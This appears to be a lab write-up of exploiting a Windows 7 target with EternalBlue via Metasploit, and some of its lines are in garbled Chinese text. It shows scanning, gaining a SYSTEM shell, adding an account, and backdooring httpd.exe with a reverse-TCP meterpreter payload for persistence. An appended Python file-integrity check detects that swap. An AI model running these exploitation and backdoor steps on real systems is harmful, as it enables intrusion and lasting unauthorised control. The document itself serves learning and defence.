Exploiting Win7 with EternalBlue
Experiment name: Exploiting Win7 with EternalBlue
Experimenter: xx
Experiment date: 2021.9.24
Objective: attack the target server through a known vulnerability and obtain a shell
Environment:
kali: 172.16.12.30
win7 target: 172.16.12.4  username: administrator  password: vgrant
Steps:
Configure the target's firewall: set the relevant "block port" security policy to Disabled.
List the MS17-010 modules and use module number 3 to scan the target machine.
msf6 > search ms17-010
msf6 > use 3
Show the module options, set the target IP and run the scan; the vulnerability is not found.
msf6 auxiliary(admin/smb/ms17_010_command) > show options
msf6 auxiliary(admin/smb/ms17_010_command) > set rhosts 172.16.12.4
rhosts => 172.16.12.4
msf6 auxiliary(admin/smb/ms17_010_command) > run
換序號(hào)4模塊進(jìn)行掃描,設(shè)置目標(biāo)主機(jī),執(zhí)行掃描,發(fā)現(xiàn)漏洞
msf6 > search ms17-010
msf6 > use 4
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 172.16.12.4
rhosts => 172.16.12.4
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
Search for the exploit module and use it.
msf6 > search ms17-010
msf6 > use 0
查看設(shè)置模塊,并設(shè)置目標(biāo)主機(jī)ip,執(zhí)行run
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 172.16.12.4
rhosts => 172.16.12.4
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
Exploitation succeeded.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd
C:\Windows\system32
Carry out actions on the target machine
Take a screenshot
Create an account
meterpreter > shell #enter the target machine's shell
C:\Windows\system32>net user #list the current accounts
Create the account cuiyi
C:\Windows\system32>net user cuiyi /add
Create a backdoor
meterpreter > ps -S httpd.exe
meterpreter > kill 3212 #the process must be killed before the file can be downloaded; after the download, background the session
meterpreter > download c:\\wamp\\bin\\apache\\apache2.2.21\\bin\\httpd.exe
Build the backdoor file
msf6 exploit(windows/smb/ms17_010_eternalblue) > use payload/windows/x64/meterpreter/reverse_tcp
msf6 payload(windows/x64/meterpreter/reverse_tcp) > show options
msf6 payload(windows/x64/meterpreter/reverse_tcp) > set lhost 172.16.12.30
lhost => 172.16.12.30
msf6 payload(windows/x64/meterpreter/reverse_tcp) > generate -p windows -x /root/desktop/httpd.exe -k -f exe -o /root/httpd_door.exe
[*] Writing 29184 bytes to /root/httpd_door.exe...
Start the listener for the backdoor's reverse connection and background it with run -j
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options
msf6 exploit(multi/handler) > set lhost 172.16.12.30
lhost => 172.16.12.30
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 172.16.12.30:4444
Switch back to the session backgrounded earlier, upload the backdoor file and rename it
msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows NT AUTHORITY\SYSTEM @ METASPLOITABLE3 172.16.12.30:4444 -> 172.16.12.4:49609 (172.16.12.4)
msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...
meterpreter > cd c:\\wamp\\bin\\apache\\apache2.2.21\\bin\\
meterpreter > pwd
c:\wamp\bin\apache\apache2.2.21\bin
meterpreter > mv httpd.exe httpd.exe.bak
meterpreter > upload /root/httpd_door.exe
[*] uploading : /root/httpd_door.exe -> httpd_door.exe
[*] Uploaded 28.50 KiB of 28.50 KiB (100.0%): /root/httpd_door.exe -> httpd_door.exe
[*] uploaded : /root/httpd_door.exe -> httpd_door.exe
meterpreter > mv httpd_door.exe httpd.exe
Restart the wampapache service; once the server is up, a new session comes back (last line)
exploit/multi/handler stays listening: every time "httpd.exe" on the remote side restarts, a session is opened on our side
Restart wampapache
Back in Kali, the connection is established successfully
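As an added defensive example (not part of the original write-up), the Python script below shows how the httpd.exe swap described above shows up in a file-integrity baseline check: the service binary's hash and size drift, and the renamed httpd.exe.bak sits beside it. The sample binary and temporary directory are constructed stand-ins.

```python
import hashlib
import tempfile
from pathlib import Path

# Added example, not from the original write-up: baseline the service binaries
# of a known-good host, then flag drift of the kind the httpd.exe swap above causes.

def sha256_of(path: Path) -> str:
    """Stream the file so large binaries need not fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def build_baseline(paths):
    """Record SHA-256 and size of each trusted binary while the host is clean."""
    return {str(p): {"sha256": sha256_of(p), "size": p.stat().st_size} for p in paths}

def check_integrity(baseline):
    """Return (path, finding) pairs for anything that drifted from the baseline."""
    findings = []
    for path_str, expected in baseline.items():
        p = Path(path_str)
        if not p.exists():
            findings.append((path_str, "missing"))
            continue
        if p.stat().st_size != expected["size"]:
            findings.append((path_str, "size changed"))
        if sha256_of(p) != expected["sha256"]:
            findings.append((path_str, "hash mismatch"))
        # The write-up renames the original to httpd.exe.bak before uploading the
        # replacement; a stray backup beside a service binary deserves a look.
        bak = p.with_name(p.name + ".bak")
        if bak.exists():
            findings.append((str(bak), "unexpected backup copy beside service binary"))
    return findings

def demo():
    """Constructed scenario in a temp dir: baseline a fake httpd.exe, then swap it."""
    with tempfile.TemporaryDirectory() as d:
        httpd = Path(d) / "httpd.exe"
        httpd.write_bytes(b"MZ constructed stand-in for the original apache binary")
        baseline = build_baseline([httpd])
        clean = check_integrity(baseline)                 # expect no findings
        httpd.rename(httpd.with_name("httpd.exe.bak"))    # mv httpd.exe httpd.exe.bak
        httpd.write_bytes(b"MZ constructed stand-in" + b"\x90" * 64)  # different bytes
        return clean, check_integrity(baseline)
```

Run `demo()` to see the clean result (an empty list) next to the three findings the swap produces; in practice the baseline would be taken from a freshly installed host and stored off-box.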
Summary